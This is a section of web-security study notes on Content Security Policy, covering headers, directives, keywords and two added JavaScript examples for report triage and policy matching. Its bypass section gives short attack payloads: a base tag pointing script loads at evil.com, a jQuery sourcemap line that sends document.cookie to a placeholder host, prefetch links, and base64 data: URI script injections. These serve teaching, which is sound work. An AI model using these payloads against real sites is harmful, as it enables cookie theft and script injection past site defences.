4.2.4. CSP

4.2.4.1. What is CSP?

Content Security Policy (CSP) is, as the name suggests, a specification concerned with content security: it defines which resources the current page is allowed to load, and so reduces the occurrence and impact of XSS.

4.2.4.2. Configuration

CSP policies can be defined through HTTP headers or meta elements.

The CSP header exists under three names:

  • Content-Security-Policy (Google Chrome)

  • X-Content-Security-Policy (Firefox)

  • X-WebKit-CSP (WebKit-based browsers, e.g. Safari)

HTTP header:
"Content-Security-Policy:" policy
"Content-Security-Policy-Report-Only:" policy

The HTTP Content-Security-Policy header declares one or more resources as safe to load, while Content-Security-Policy-Report-Only lets the server monitor (but not enforce) a policy. When several headers define policies, the one defined first takes precedence.

HTML meta:

<meta http-equiv="content-security-policy" content="policy">
<meta http-equiv="content-security-policy-report-only" content="policy">

4.2.4.2.1. Instruction Description

Directive      Description
-------------  ----------------------------------------------------------------------------
default-src    Defines the default resource loading policy
connect-src    Defines the loading policy for Ajax, WebSocket and similar connections
font-src       Defines the font loading policy
frame-src      Defines the frame loading policy
img-src        Defines the image loading policy
media-src      Defines the loading policy for <audio>, <video> and other media resources
object-src     Defines the loading policy for <applet>, <embed>, <object> and similar resources
script-src     Defines the JS loading policy
style-src      Defines the CSS loading policy
base-uri       Defines the <base> root URL policy; does not fall back to default-src
sandbox        A value of allow-forms enables a sandbox for the resource
report-uri     The value (e.g. /report-uri) is the URI to which violation logs are submitted
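The report-uri directive (and the Content-Security-Policy-Report-Only header) only help if someone reads the reports. The following Node.js script is an added example, not code from the original notes: it parses the JSON bodies a browser POSTs to the report endpoint and sorts them into triage buckets. The field names are those of the report-uri JSON format (a top-level "csp-report" object); the sample reports, the bucket names and the choice of which directives count as "active content" are this example's own assumptions.

```javascript
// Added example, not code from the original notes: parsing and triaging the
// JSON bodies a browser POSTs to the report-uri endpoint (also sent under
// Content-Security-Policy-Report-Only). Field names follow the report-uri
// JSON format; the sample reports below are constructed for this example.

function parseReport(body) {
  const r = JSON.parse(body)['csp-report'];
  if (!r) throw new Error('not a csp-report body');
  return {
    documentUri: r['document-uri'],
    // effective-directive names the directive that actually applied after
    // default-src fallback; older reports carry only violated-directive
    directive: (r['effective-directive'] || r['violated-directive'] || '').split(/\s+/)[0],
    blockedUri: r['blocked-uri'] || '',
  };
}

// Buckets chosen for triage in this example (an assumption, not a standard):
// active-content violations from another origin are the ones worth alerting on.
function classify(report) {
  const { blockedUri, directive, documentUri } = report;
  if (blockedUri === 'inline' || blockedUri === 'eval') return 'inline-or-eval';
  if (/^(data|blob|filesystem)(:|$)/.test(blockedUri)) return 'scheme-source';
  let blockedOrigin;
  try {
    blockedOrigin = new URL(blockedUri).origin;
  } catch {
    return 'unparseable';
  }
  const active = ['script-src', 'object-src', 'base-uri'].includes(directive);
  if (active && blockedOrigin !== new URL(documentUri).origin) return 'cross-origin-active';
  return 'other';
}

// Count reports per bucket; returns { bucket: count }
function summarize(bodies) {
  const counts = {};
  for (const body of bodies) {
    const kind = classify(parseReport(body));
    counts[kind] = (counts[kind] || 0) + 1;
  }
  return counts;
}

// Constructed sample reports (not captured from a real browser)
const SAMPLE_REPORTS = [
  JSON.stringify({ 'csp-report': {
    'document-uri': 'https://app.example/profile', 'violated-directive': "script-src 'self'",
    'effective-directive': 'script-src', 'blocked-uri': 'inline', 'status-code': 200 } }),
  JSON.stringify({ 'csp-report': {
    'document-uri': 'https://app.example/profile', 'violated-directive': "base-uri 'self'",
    'effective-directive': 'base-uri', 'blocked-uri': 'https://other.example/', 'status-code': 200 } }),
  JSON.stringify({ 'csp-report': {
    'document-uri': 'https://app.example/profile', 'violated-directive': "default-src 'self'",
    'effective-directive': 'object-src', 'blocked-uri': 'data', 'status-code': 200 } }),
  JSON.stringify({ 'csp-report': {
    'document-uri': 'https://app.example/profile', 'violated-directive': "img-src 'self'",
    'effective-directive': 'img-src', 'blocked-uri': 'https://img.other.example/a.png', 'status-code': 200 } }),
];

console.log(summarize(SAMPLE_REPORTS));
// { 'inline-or-eval': 1, 'cross-origin-active': 1, 'scheme-source': 1, other: 1 }
```

Running a new policy in Report-Only mode first and feeding this kind of summary back to the team is how a policy gets tightened without breaking the site; the cross-origin-active bucket is the one that deserves an alert rather than a dashboard entry.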

4.2.4.2.2. Keywords

  • *
    • Allows loading from any URL except the data:, blob: and filesystem: schemes

    • e.g. img-src *

  • 'none'
    • Disallows loading resources from any URL

    • e.g. object-src 'none'

  • 'self'
    • Only same-origin resources may be loaded

    • e.g. img-src 'self'

  • data:
    • Resources may be loaded through the data: scheme

    • e.g. img-src 'self' data:

  • domain.example.com
    • Resources may only be loaded from the given domain

    • e.g. img-src domain.example.com

  • *.example.com
    • Resources may be loaded from any subdomain of example.com

    • e.g. img-src *.example.com

  • https://cdn.com
    • Resources may only be loaded over https from the given domain

    • e.g. img-src https://cdn.com

  • https:
    • Resources may only be loaded over https, from any domain

    • e.g. img-src https:

  • 'unsafe-inline'
    • Allows inline resources to execute: style attributes, event handlers such as onclick, and inline script tags

    • e.g. script-src 'unsafe-inline'

  • 'unsafe-eval'
    • Allows unsafe code-execution methods such as JavaScript's eval()

    • e.g. script-src 'unsafe-eval'

  • 'nonce-<base64-value>'
    • Uses a random nonce; tags whose nonce attribute matches it are allowed to load

    • e.g. script-src 'nonce-bm9uY2U='

  • '<hash-algo>-<base64-value>'
    • Allows code blocks whose hash matches the given value to execute

    • e.g. script-src 'sha256-<base64-value>'

4.2.4.2.3. Configuration example

Allow inline JS to execute, but load other resources only from the same origin:

Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline';
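To make the keyword semantics above concrete, here is an added example (not code from the original notes) in JavaScript: a small policy parser and a source-expression matcher that decides whether a given URL may be loaded under a given directive. It implements the keywords from the list (*, 'none', 'self', scheme sources such as data: and https:, host sources with or without a scheme, and the *.example.com wildcard) plus the default-src fallback, with base-uri deliberately not inheriting default-src as the directive table states. It is a simplified subset of the real CSP matching rules: port and path matching are omitted, which is this example's own simplification.

```javascript
// Added example, not code from the original notes: a simplified CSP policy
// parser plus a source-expression matcher for the keywords listed above.
// Simplifications (assumptions of this example): no port or path matching,
// and only the keywords from the list are handled.

function parsePolicy(policy) {
  // "default-src 'self'; img-src 'self' data:" -> Map { 'default-src' => ["'self'"], ... }
  // A directive repeated within one policy keeps its first definition.
  const directives = new Map();
  for (const part of policy.split(';')) {
    const [name, ...sources] = part.trim().split(/\s+/).filter(Boolean);
    if (name && !directives.has(name.toLowerCase())) {
      directives.set(name.toLowerCase(), sources);
    }
  }
  return directives;
}

// Fetch directives that inherit default-src when absent. base-uri is not
// among them (see the directive table above).
const FALLS_BACK_TO_DEFAULT = new Set([
  'connect-src', 'font-src', 'frame-src', 'img-src', 'media-src',
  'object-src', 'script-src', 'style-src',
]);

const SCHEME_ONLY = /^[a-z][a-z0-9+.-]*:$/i;              // https:  data:
const WITH_SCHEME = /^([a-z][a-z0-9+.-]*):\/\/([^/:]+)/i;  // https://cdn.com/...

function hostMatches(pattern, host) {
  // *.example.com matches any subdomain but not example.com itself
  if (pattern.startsWith('*.')) {
    const suffix = pattern.slice(1);
    return host.endsWith(suffix) && host.length > suffix.length;
  }
  return pattern === host;
}

function sourceMatches(source, url, pageOrigin) {
  const target = new URL(url);
  const page = new URL(pageOrigin);
  if (source === "'none'") return false;
  if (source === "'self'") return target.origin === page.origin;
  if (source === '*') {
    // the wildcard covers every scheme except data:, blob:, filesystem:
    return !['data:', 'blob:', 'filesystem:'].includes(target.protocol);
  }
  if (source.startsWith("'")) return false; // 'unsafe-inline', nonces, hashes never match a URL
  if (SCHEME_ONLY.test(source)) return target.protocol === source.toLowerCase();

  // host source: cdn.com, *.example.com or https://cdn.com
  const explicit = WITH_SCHEME.test(source);
  const m = (explicit ? source : `${page.protocol}//${source}`).match(WITH_SCHEME);
  if (!m) return false;
  const [, scheme, hostPattern] = m;
  // without an explicit scheme the page's scheme applies (an http page may also load https)
  const schemeOk = explicit
    ? target.protocol === `${scheme.toLowerCase()}:`
    : (target.protocol === page.protocol || (page.protocol === 'http:' && target.protocol === 'https:'));
  return schemeOk && hostMatches(hostPattern.toLowerCase(), target.hostname);
}

function isAllowed(policy, directive, url, pageOrigin) {
  const directives = parsePolicy(policy);
  let sources = directives.get(directive);
  if (sources === undefined && FALLS_BACK_TO_DEFAULT.has(directive)) {
    sources = directives.get('default-src');
  }
  if (sources === undefined) return true; // nothing restricts this directive
  return sources.some((s) => sourceMatches(s, url, pageOrigin));
}

// Constructed policy and page origin for the demonstration
const POLICY = "default-src 'self'; img-src 'self' data: *.cdn.example; script-src 'self' https://static.example.com";
const PAGE = 'https://app.example';

console.log(isAllowed(POLICY, 'img-src', 'https://img.cdn.example/logo.png', PAGE));   // true
console.log(isAllowed(POLICY, 'img-src', 'https://cdn.example/logo.png', PAGE));       // false: *.cdn.example excludes the apex
console.log(isAllowed(POLICY, 'script-src', 'http://static.example.com/a.js', PAGE));  // false: https required
console.log(isAllowed(POLICY, 'connect-src', 'https://api.other.example/v1', PAGE));   // false: falls back to default-src 'self'
console.log(isAllowed(POLICY, 'base-uri', 'https://other.example/', PAGE));            // true: base-uri does not inherit default-src
```

The last line is the point most often missed when reviewing a policy: a strict default-src does nothing for base-uri, so a policy that relies on default-src alone still needs an explicit base-uri directive.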

4.2.4.3. Bypass

4.2.4.3.1. Preloading

To improve the user experience and make the browser more efficient, browsers have a preloading feature that uses idle time to fetch specified content and cache it. The technique is subdivided into DNS-prefetch, subresource, prefetch, preconnect and prerender.

HTML5 page preloading is specified with the rel attribute of the link tag. If the CSP header contains unsafe-inline, preloading can be used to make requests to the outside world, for example:

<!-- preloading page -->
<link rel='prefetch' href='http://xxxx'><!-- firefox -->
<link rel='prerender' href='http://xxxx'><!-- chrome -->
<!-- preloading image -->
<link rel='prefetch' href='http://xxxx/x.jpg'>
<!-- DNS prefetch -->
<link rel="dns-prefetch" href="http://xxxx">
<!-- preloading specific file types -->
<link rel='preload' href='//xxxxx/xx.js'><!-- chrome -->

Not every page can be preloaded; the preload operation is blocked in the following cases:

  • The URL points to a download resource

  • The page contains audio or video

  • Ajax requests using POST, PUT or DELETE

  • HTTP authentication

  • HTTPS pages

  • Malware pages

  • Popup pages

  • Pages that consume a lot of resources

  • Chrome developer tools are open

4.2.4.3.2. MIME Sniff

Suppose the CSP forbids cross-site loading of scripts but allows cross-site loading of images. An image file that actually contains script is served, and the page references it with <script href='http://xxx.com/xx.jpg'>. CSP treats the resource as an image, so the check is bypassed; if the website does not return the correct MIME type, the browser guesses it and may load the image as a script.

4.2.4.3.3. 302 Redirect

Bypassing CSP through a 302 redirect is subject to the following limitations:

  • The redirecting host (the springboard) must be within an allowed domain.

  • The host part of the file to be loaded must match the host part of the allowed domain.

4.2.4.3.4. iframe

When code can already be executed, one can create a frame whose source is a static resource such as a CSS or JS file. If the configuration is wrong, that frame has no CSP, and creating another frame inside it achieves the bypass. Similarly, inserting ../../../ or /%2e%2e%2f into links that may make the server return an error page can achieve the same effect.

4.2.4.3.5. base-uri

When script-src uses a nonce (or is unrestricted) and base-uri is unrestricted, the root URL can be changed with a base tag to bypass the policy; http://evil.com/main.js is then loaded as follows:

<base href="http://evil.com/">
<script nonce="correct value" src="/main.js"></script>

4.2.4.3.6. Others

  • location bypass

  • Bypass on same-origin sites with malicious SVGs, when SVGs can be uploaded

  • When there is a CRLF vulnerability and the controllable point lies above the CSP header, content can be injected into the HTTP response to affect CSP parsing

  • CDN bypass: if the website trusts a CDN, static resources hosted on that CDN can be used to bypass the policy

  • Angular versions >=1.5.0 and <1.5.9 have a vulnerability (Git Pull Request)

  • jQuery sourcemap
    document.write(`<script>
    //@        sourceMappingURL=http://xxxx/`+document.cookie+`<\/script>`);

  • ping attribute of the a tag

  • For Firefox: <META HTTP-EQUIV="refresh" CONTENT="0; url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnSWhhdmVZb3VOb3cnKTs8L3NjcmlwdD4=">

  • <link rel="import" />

  • <meta http-equiv="refresh" content="0; url=http://...." />

  • When only script-src is restricted
    • <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>